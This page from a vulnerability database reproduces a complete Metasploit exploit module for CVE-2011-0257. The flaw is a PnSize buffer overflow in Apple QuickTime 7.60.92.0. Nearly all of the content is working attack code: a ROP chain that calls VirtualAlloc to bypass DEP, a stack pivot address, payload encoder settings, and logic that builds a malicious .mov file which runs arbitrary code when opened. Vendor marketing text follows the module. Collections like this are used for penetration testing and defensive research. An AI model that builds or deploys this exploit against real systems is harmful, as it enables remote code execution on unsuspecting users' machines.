Lucene search
K

Apple QuickTime PICT PnSize Buffer Overflow

🗓️ 03 Sep 2011 21:17:58Reported by MC <[email protected]>, corelanc0d3r <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 40 Views

Apple QuickTime PICT PnSize Buffer Overflow exploit in .mov fil

Related
Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Apple QuickTime PICT PnSize Buffer Overflow',
      'Description'    => %q{
          This module exploits a vulnerability in Apple QuickTime Player 7.60.92.0.
        When opening a .mov file containing a specially crafted PnSize value, an attacker
        may be able to execute arbitrary code.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'MC',           # Original Metasploit Module
          'corelanc0d3r <peter.ve[at]corelan.be>', # Added DEP Bypass support
        ],
      'References'     =>
        [
          [ 'CVE', '2011-0257' ],
          [ 'OSVDB', '74687' ],
          [ 'EDB', '17777' ],
          [ 'BID', '49144' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
          'DisablePayloadHandler' => true
        },
      'Payload'        =>
        {
          'Space'          => 750,
          'BadChars'       => "",  #Memcpy
          'EncoderType'    => Msf::Encoder::Type::AlphanumUpper,
          'DisableNops'    =>  'True',
          'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
          'EncoderOptions' =>
            {
              'BufferRegister' => 'ECX',
            },
        },
      'Platform' => 'win',
      'Targets'        =>
        [
          # QuickTime.qts 7.60.92.0 # ADD ESP,4D0 # RETN
          [ 'Windows XP SP3 with DEP bypass', { 'Ret' => 0x67202c75 } ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2011-08-08',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME',   [ false, 'The file name.',  'msf.mov' ]),
      ])
  end

  def exploit
    # !mona rop
    rop =
    [
      0x67e21084,  # POP ECX # RETN [QuickTimeMPEG4.qtx]
      0x67ed30c0,  # ptr to &VirtualAlloc() [IAT QuickTimeMPEG4Authoring.qtx]
      0x68994002,  # MOV EAX,DWORD PTR DS:[ECX] # RETN [QTOLibrary.dll]
      0x6696ca36,  # XCHG EAX,ESI # RETN [QuickTime.qts]
      0x66c78001,  # POP EBP # RETN [QuickTime.qts]
      0x67eb8573,  # & call esp [QuickTimeMPEG4Authoring.qtx]
      0x67208003,  # POP EBX # RETN [QuickTime.qts]
      0x00000001,  # 0x00000001-> ebx
      0x6783ee02,  # POP EDX # RETN [QuickTimeInternetExtras.qtx]
      0x00001000,  # 0x00001000-> edx
      0x67e21084,  # POP ECX # RETN [QuickTimeMPEG4.qtx]
      0x00000040,  # 0x00000040-> ecx
      0x6762a008,  # POP EDI # RETN [QuickTimeVR.qtx]
      0x66a78005,  # RETN (ROP NOP) [QuickTime.qts]
      0x685a9802,  # POP EAX # RETN [QuickTimeAudioSupport.qtx]
      0x90909090,  # nop
      0x682f0001,  # PUSHAD # RETN [QuickTimeH264.qtx]
    ].pack('V*')

    stackpivot = [target.ret].pack('L')

    buffer = rand_text_alpha_upper(2)
    buffer << rop
    buffer << payload.encoded

    junk = rand_text_alpha_upper(2306 - buffer.length)

    buffer << junk
    buffer << stackpivot
    buffer << rand_text_alpha_upper(3000)

    path = File.join( Msf::Config.data_directory, "exploits", "CVE-2011-0257.mov" )
    fd = File.open(path, "rb" )
    sploit = fd.read(fd.stat.size)
    fd.close

    sploit << buffer

    file_create(sploit)
  end
end
__END__
http://mirrors.apple2.org.za/apple.cabi.net/Graphics/PICT.and_QT.INFO/PICT.file.format.TI.txt

Opcode   Name                       Description                  Data Size (in bytes)

$0007    PnSize                     pen size (point)             4

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Oct 2020 20:00Current
0.7Low risk
Vulners AI Score0.7
CVSS 29.3
EPSS0.60106
40